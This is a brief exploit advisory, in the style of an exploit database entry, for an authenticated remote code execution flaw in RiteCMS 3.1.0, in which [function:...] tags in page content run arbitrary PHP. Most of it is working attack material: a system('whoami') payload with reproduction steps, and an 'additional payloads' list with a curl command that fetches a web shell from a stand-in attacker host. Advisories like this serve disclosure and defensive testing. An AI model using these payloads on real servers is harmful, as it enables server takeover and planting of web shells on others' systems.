# Exploit Title: RiteCMS 3.1.0 - Authenticated Remote Code Execution
# Date: 2025-10-26
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://github.com/handylulu/RiteCMS
# Software Link:
https://github.com/handylulu/RiteCMS/releases/download/V3.1.0/ritecms.v3.1.0.zip
# Version: 3.1.0
# Tested on: Windows XP
## Vulnerability Description
RiteCMS v3.1.0 contains an authenticated Remote Code Execution (RCE) via
its content_function() handler: [function:...] tags in page content are
evaluated, allowing a user with page-editing privileges to execute
arbitrary PHP on the server.
## Exploit Code
Create or edit any page with the following content:
[function:system('whoami')]
## Steps to Reproduce
1. Login as administrator
2. Create new page or edit existing page
3. Insert [function:system('whoami')] in content
4. Save and view page
5. Command output will be displayed
## additional payloads
[function:system('curl http://attacker/shell.php -o shell.php')]
[function:system('id')]Credits and Partners
All rights reserved nPulse.net 2009 - 2026
Powered by: MVCP2 / BVCP / ASPF-MILTER / PHP 8.3 / NGINX / FreeBSD
